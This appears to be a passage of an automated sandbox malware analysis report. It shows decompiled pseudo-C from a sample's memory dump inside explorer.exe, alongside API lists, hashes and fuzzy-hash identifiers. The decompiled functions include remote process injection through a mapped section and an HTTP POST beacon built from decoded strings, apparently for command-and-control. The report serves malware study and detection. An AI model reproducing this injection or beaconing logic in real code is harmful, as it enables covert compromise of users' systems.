										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E000C8604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E000C95E1(_t283, 0x219);
										E000C9640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E000C85D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E000C91E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E000CDA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E000C861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































        0x000cdb45
        0x000cdb4b
        0x000cdb52
        0x000cdb55
        0x000cdb58
        0x000cdb5d
        0x000cdb5f
        0x000cdb64
        0x000cdfac
        0x000cdfac
        0x000cdb71
        0x000cdb73
        0x000cdb76
        0x000cdb79
        0x000cdf91
        0x000cdf97
        0x000cdfa1
        0x00000000
        0x000cdfa6
        0x000cdb84
        0x000cdb8b
        0x000cdb92
        0x000cdb95
        0x000cdb9a
        0x000cdb9c
        0x000cdb9f
        0x000cdba2
        0x000cdba3
        0x000cdbac
        0x000cdbb2
        0x000cdbb5
        0x000cdbbe
        0x000cdbc3
        0x000cdbc8
        0x000cdbdf
        0x000cdbec
        0x000cdbef
        0x000cdbf6
        0x000cdbfb
        0x000cdc02
        0x000cdc07
        0x000cdc0e
        0x000cdc10
        0x000cdc1c
        0x000cdc1f
        0x000cdc21
        0x000cdf81
        0x000cdf82
        0x000cdf8b
        0x00000000
        0x000cdf8b
        0x000cdc27
        0x000cdc2a
        0x000cdc2d
        0x000cdc30
        0x000cdc32
        0x000cdf4d
        0x000cdf50
        0x000cdf53
        0x000cdf55
        0x000cdf77
        0x000cdf7c
        0x000cdf57
        0x000cdf5a
        0x000cdf65
        0x000cdf6c
        0x000cdf6c
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000cdc38
        0x000cdc38
        0x000cdc4a
        0x000cdc4d
        0x000cdc4f
        0x00000000
        0x00000000
        0x000cdc57
        0x000cdc5a
        0x000cdc5d
        0x000cdc60
        0x000cdc63
        0x000cdc66
        0x00000000
        0x00000000
        0x000cdc6c
        0x000cdc7a
        0x000cdc7d
        0x000cdc7f
        0x000cdc98
        0x000cdca7
        0x000cdcaf
        0x000cdcaf
        0x000cdcb2
        0x000cdcb9
        0x000cdcbd
        0x000cdcc3
        0x000cdcc5
        0x000cdf35
        0x000cdf3b
        0x000cdf41
        0x000cdf44
        0x000cdf44
        0x00000000
        0x000cdf44
        0x000cdcd4
        0x000cdce8
        0x000cdcec
        0x000cdcee
        0x000cdcf3
        0x000cdf02
        0x000cdf08
        0x000cdf13
        0x000cdf1e
        0x000cdf24
        0x000cdf2a
        0x000cdf2d
        0x00000000
        0x000cdf2d
        0x000cdcf9
        0x000cded0
        0x000cded0
        0x000cded3
        0x000cded6
        0x00000000
        0x00000000
        0x000cdd01
        0x000cdd09
        0x000cdd10
        0x000cdd16
        0x000cdd18
        0x00000000
        0x00000000
        0x000cdd21
        0x000cdd36
        0x000cdd3c
        0x000cdd45
        0x000cdd48
        0x000cdd4b
        0x000cdd4d
        0x000cdec3
        0x000cdec6
        0x000cdecf
        0x000cdecf
        0x00000000
        0x000cdecf
        0x000cdd5d
        0x000cdd60
        0x000cdd67
        0x000cdd6d
        0x000cdd70
        0x000cdd73
        0x000cdd76
        0x000cdd79
        0x000cddb5
        0x000cddb5
        0x000cddb8
        0x000cde64
        0x000cde78
        0x000cde88
        0x000cde8c
        0x000cde8e
        0x000cdea5
        0x000cdea9
        0x000cdeb2
        0x000cdebd
        0x00000000
        0x000cdebd
        0x000cde94
        0x000cde95
        0x000cde9a
        0x000cde9a
        0x000cde9c
        0x000cde9d
        0x000cdea2
        0x00000000
        0x000cdea2
        0x000cddbe
        0x000cddbe
        0x000cddc1
        0x000cde2c
        0x000cde40
        0x000cde50
        0x000cde54
        0x000cde56
        0x00000000
        0x00000000
        0x000cde5c
        0x000cde5d
        0x00000000
        0x000cde5d
        0x000cddc3
        0x000cddc3
        0x000cddc6
        0x00000000
        0x00000000
        0x000cddc8
        0x000cddcb
        0x00000000
        0x00000000
        0x000cddcd
        0x000cddcd
        0x000cddd3
        0x000cddef
        0x000cddfe
        0x000cde07
        0x000cde0c
        0x000cde0f
        0x000cde15
        0x000cde15
        0x000cde1a
        0x000cde26
        0x00000000
        0x000cde26
        0x000cddd8
        0x00000000
        0x000cddd8
        0x000cdd7b
        0x000cdda2
        0x000cdda7
        0x000cddac
        0x000cddae
        0x000cddae
        0x00000000
        0x000cddac
        0x000cdd7d
        0x000cdd7d
        0x000cdd80
        0x00000000
        0x00000000
        0x000cdd86
        0x000cdd86
        0x000cdd89
        0x00000000
        0x00000000
        0x000cdd8f
        0x000cdd8f
        0x000cdd92
        0x00000000
        0x00000000
        0x000cdd98
        0x000cdd9b
        0x00000000
        0x00000000
        0x000cdd9d
        0x00000000
        0x000cdd9d
        0x000cdedf
        0x000cdee5
        0x000cdeeb
        0x000cdeee
        0x000cdef1
        0x000cdef1
        0x000cdef4
        0x000cdef5
        0x000cdef8
        0x000cdefa
        0x00000000
        0x00000000
        0x000cdf4a
        0x000cdf4a
        0x00000000
        0x000cdf4a
        0x000cdc81
        0x000cdc87
        0x00000000
        0x000cdc87
        0x000cdf47
        0x00000000
        0x000cdbca
        0x000cdbcf
        0x000cdbd4
        0x00000000
        0x000cdbd8

        APIs
          • Part of subcall function 000CD523: CoInitializeEx.OLE32(00000000,00000000), ref: 000CD536
          • Part of subcall function 000CD523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000CD547
          • Part of subcall function 000CD523: CoCreateInstance.OLE32(000DB848,00000000,00000001,000DB858,?), ref: 000CD55E
          • Part of subcall function 000CD523: SysAllocString.OLEAUT32(00000000), ref: 000CD569
          • Part of subcall function 000CD523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 000CD594
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBE5
        • SysAllocString.OLEAUT32(00000000), ref: 000CDBF9
        • SysFreeString.OLEAUT32(?), ref: 000CDF82
        • SysFreeString.OLEAUT32(?), ref: 000CDF8B
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
        • String ID: FALSE$TRUE
        • API String ID: 1290676130-1412513891
        • Opcode ID: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
        • Instruction ID: 6d3b30d497bcb0c8dfd19b86225b387c7b8e5a58e6196622d1d0c5e8feda6800
        • Opcode Fuzzy Hash: b4121a1a41596529dc1ee25c4bcfd864bb451ba9a9ed97b737e2e7ffff192dbb
        • Instruction Fuzzy Hash: DCE14F71D00219AFDB54EFA4C989FEEBBB9FF48300F10816EE505AB291DB75A905CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CC6C0, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
        Download Yara Rule
        C-Code - Quality: 59%
        			E000CC6C0(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xde688; // 0xf0000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E000CE23E(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xde780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xde780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xde780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xde780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E000C8669( *0xde688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xde684; // 0x64f8f0
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xde684; // 0x64f8f0
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E000C861A( &_v32, 0x1ac4);
					_t141 =  *0xde688; // 0xf0000
					 *0xde688 = _t131;
					E000C86E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E000CC63F(_v12, _v8, _v36);
					 *0xde688 = _t141;
					goto L14;
				}
			}


































        0x000cc6c6
        0x000cc6cd
        0x000cc6cf
        0x000cc6d1
        0x000cc6d3
        0x000cc6d6
        0x000cc6d9
        0x000cc6dc
        0x000cc6df
        0x000cc6e2
        0x000cc6e5
        0x000cc6ef
        0x000cc6f2
        0x000cc6f9
        0x000cc6fe
        0x000cc6fe
        0x000cc704
        0x000cc706
        0x000cc70f
        0x000cc8b5
        0x000cc8b9
        0x000cc8be
        0x000cc8c4
        0x000cc8c7
        0x000cc8c7
        0x000cc8cb
        0x000cc8d0
        0x000cc8d5
        0x000cc8e2
        0x000cc8e2
        0x000cc8eb
        0x000cc8ed
        0x000cc8f5
        0x000cc8f5
        0x000cc8fc
        0x000cc8fc
        0x000cc718
        0x000cc719
        0x000cc71e
        0x000cc724
        0x000cc726
        0x000cc727
        0x000cc728
        0x000cc72d
        0x000cc72e
        0x000cc738
        0x00000000
        0x00000000
        0x000cc743
        0x000cc74d
        0x000cc757
        0x000cc75a
        0x000cc760
        0x000cc767
        0x000cc768
        0x000cc769
        0x000cc772
        0x000cc773
        0x000cc774
        0x000cc776
        0x000cc779
        0x000cc77c
        0x000cc77f
        0x000cc782
        0x000cc78e
        0x000cc7b0
        0x000cc7b8
        0x000cc7bb
        0x000cc7c6
        0x000cc7c6
        0x000cc7b8
        0x000cc7cc
        0x000cc7d5
        0x000cc7d7
        0x000cc7d8
        0x000cc7da
        0x000cc7db
        0x000cc7dc
        0x000cc7dd
        0x000cc7e1
        0x000cc7e8
        0x000cc7e9
        0x000cc7f1
        0x000cc8b2
        0x00000000
        0x000cc7f7
        0x000cc7f7
        0x000cc7f9
        0x000cc7fa
        0x000cc7ff
        0x000cc800
        0x000cc801
        0x000cc802
        0x000cc803
        0x000cc809
        0x000cc80a
        0x000cc80f
        0x000cc810
        0x000cc818
        0x00000000
        0x00000000
        0x000cc82e
        0x000cc830
        0x000cc837
        0x00000000
        0x00000000
        0x000cc848
        0x000cc84e
        0x000cc856
        0x000cc859
        0x000cc85f
        0x000cc86f
        0x000cc87b
        0x000cc880
        0x000cc886
        0x000cc896
        0x000cc8a2
        0x000cc8aa
        0x00000000
        0x000cc8aa

        APIs
        • RegisterClassExA.USER32 ref: 000CC785
        • CreateWindowExA.USER32 ref: 000CC7B0
        • DestroyWindow.USER32 ref: 000CC7BB
        • UnregisterClassA.USER32(?,00000000), ref: 000CC7C6
        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 000CC7E2
        • GetCurrentProcess.KERNEL32(00000000), ref: 000CC8DB
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
        • String ID: 0$cdcdwqwqwq$sadccdcdsasa
        • API String ID: 3082384575-2319545179
        • Opcode ID: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
        • Instruction ID: 90c4ed74458554630278fabfd861411d24eeea79e783751d3e5e158c8fbe04a2
        • Opcode Fuzzy Hash: 9b7369576984f46db23a614ba67677450efd48935115db429422099e1f3bac59
        • Instruction Fuzzy Hash: EF711971901249AFEB11DF95DC48FAFBBB9EF49700F14406AF905AB290D774AA04CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5F82, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 104COMMON
        Download Yara Rule
        C-Code - Quality: 78%
        			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t19;
				struct HINSTANCE__* _t22;
				long _t23;
				long _t24;
				char* _t27;
				WCHAR* _t32;
				long _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t49;
				int _t53;
				void* _t54;
				intOrPtr* _t55;
				void* _t57;

				_t49 = __edx;
				OutputDebugStringA("Hello qqq");
				if(_a8 != 1) {
					if(_a8 != 0) {
						L12:
						return 1;
					}
					SetLastError(0xaa);
					L10:
					return 0;
				}
				E000C85EF();
				_t19 = E000C980C( &_v16);
				_t57 = _t49;
				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
					goto L12;
				} else {
					E000C8F78();
					GetModuleHandleA(0);
					_t22 = _a4;
					 *0xde69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000C95C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000C85C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E000D2A5B( *0xde69c);
						 *_t55 = 0x7c3;
						 *0xde684 = E000CE1BC(0xdba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000C95E1(0xdba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000C85D5();
							_v8 = 0;
							_t37 =  *0xde684; // 0x64f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E000C5E06, 0, 0,  &_v8);
							 *0xde6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000C85D5();
					}
					goto L10;
				}
			}





















        0x000c5f82
        0x000c5f92
        0x000c5f9c
        0x000c60d0
        0x000c60c3
        0x00000000
        0x000c60c5
        0x000c60d7
        0x000c6098
        0x00000000
        0x000c6098
        0x000c5fa2
        0x000c5faa
        0x000c5fb1
        0x000c5fb3
        0x00000000
        0x000c5fc6
        0x000c5fc6
        0x000c5fcc
        0x000c5fd2
        0x000c5fe2
        0x000c5fe7
        0x000c5fef
        0x000c5ff7
        0x000c6013
        0x000c6018
        0x000c601b
        0x000c601d
        0x000c601f
        0x000c602c
        0x000c6035
        0x000c603e
        0x000c6043
        0x000c6044
        0x000c6052
        0x000c605c
        0x000c606d
        0x000c6072
        0x000c6079
        0x000c6080
        0x000c6083
        0x000c608f
        0x000c6090
        0x000c609c
        0x000c60a5
        0x000c60a9
        0x000c60b7
        0x000c60ba
        0x000c60c1
        0x00000000
        0x00000000
        0x00000000
        0x000c60c1
        0x000c6092
        0x000c6097
        0x00000000
        0x000c5ff7

        APIs
        • OutputDebugStringA.KERNEL32(Hello qqq), ref: 000C5F92
        • SetLastError.KERNEL32(000000AA), ref: 000C60D7
          • Part of subcall function 000C85EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,000C5FA7), ref: 000C85F8
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C5FCC
        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 000C5FE7
        • GetLastError.KERNEL32 ref: 000C5FEF
        • memset.MSVCRT ref: 000C6013
        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 000C6035
        • GetFileAttributesW.KERNEL32(00000000), ref: 000C6083
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemWidememset
        • String ID: Hello qqq
        • API String ID: 3872149766-3610097158
        • Opcode ID: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
        • Instruction ID: 2d4d97f5f62f02f8306ca91f288e7d0caa95757fa3380263e34e887ee25bd247
        • Opcode Fuzzy Hash: afce7757140dcc93f3ebf7c21342cb0b72ab48de7d80f37f0806af0865a9f0e7
        • Instruction Fuzzy Hash: 6831A670900604ABEB64BB34DC49FAF3BB8EB55710F20852EF915D6192DF789A49CB31
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
        Download Yara Rule
        C-Code - Quality: 83%
        			E000CE668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000C95C7(0x85b);
				_v60 = E000C95C7(0xdc9);
				_v56 = E000C95C7(0x65d);
				_v52 = E000C95C7(0xdd3);
				_t105 = E000C95C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E000CC379(_t214));
				_t113 =  *0xde6a4; // 0x2580780
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0xde6a4; // 0x2580780
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0xde788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0xde6a4; // 0x2580780
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0xde6a4; // 0x2580780
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0xde6a4; // 0x2580780
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0xde6a4; // 0x2580780
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0xde6a4; // 0x2580780
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E000C980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0xde6a4; // 0x2580780
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E000C980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000C95C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0xde6a4; // 0x2580780
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E000CC379(_t217), _a4, _a8);
										E000C85C2( &_v12);
										if(_a24 != 0) {
											E000C980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0xde6a4; // 0x2580780
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E000C9749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0xde6a4; // 0x2580780
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0xde6a4; // 0x2580780
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0xde6a4; // 0x2580780
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0xde6a4; // 0x2580780
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0xde6a4; // 0x2580780
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0xde6a4; // 0x2580780
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0xde6a4; // 0x2580780
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0xde6a4; // 0x2580780
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































        0x000ce671
        0x000ce683
        0x000ce68c
        0x000ce696
        0x000ce69a
        0x000ce6ab
        0x000ce6c2
        0x000ce6cf
        0x000ce6dc
        0x000ce6e9
        0x000ce6ec
        0x000ce6f1
        0x000ce6f6
        0x000ce6f8
        0x000ce700
        0x000ce70b
        0x000ce712
        0x000ce71e
        0x000ce721
        0x000ce72f
        0x000ce732
        0x000ce738
        0x000ce739
        0x000ce73b
        0x000ce744
        0x000ce745
        0x000ce74a
        0x000ce750
        0x000ce75a
        0x000ce75c
        0x000ce761
        0x000ce761
        0x000ce770
        0x000ce77f
        0x000ce783
        0x000ce792
        0x000ce795
        0x000ce79a
        0x000ce79e
        0x000ce7a5
        0x000ce7ac
        0x000ce7b4
        0x000ce7bc
        0x000ce7c3
        0x000ce7cb
        0x000ce7d3
        0x000ce7da
        0x000ce7e2
        0x000ce7ea
        0x000ce7ff
        0x000ce80c
        0x000ce80e
        0x000ce813
        0x000ce813
        0x000ce81a
        0x000ce82b
        0x000ce830
        0x000ce832
        0x000ce832
        0x000ce846
        0x000ce858
        0x000ce85a
        0x000ce85d
        0x000ce862
        0x000ce862
        0x000ce869
        0x000ce878
        0x000ce87c
        0x000ce8ba
        0x000ce8bf
        0x000ce8c7
        0x000ce8cc
        0x000ce8d7
        0x000ce8dd
        0x000ce8e7
        0x000ce8ea
        0x000ce8f3
        0x000ce8f8
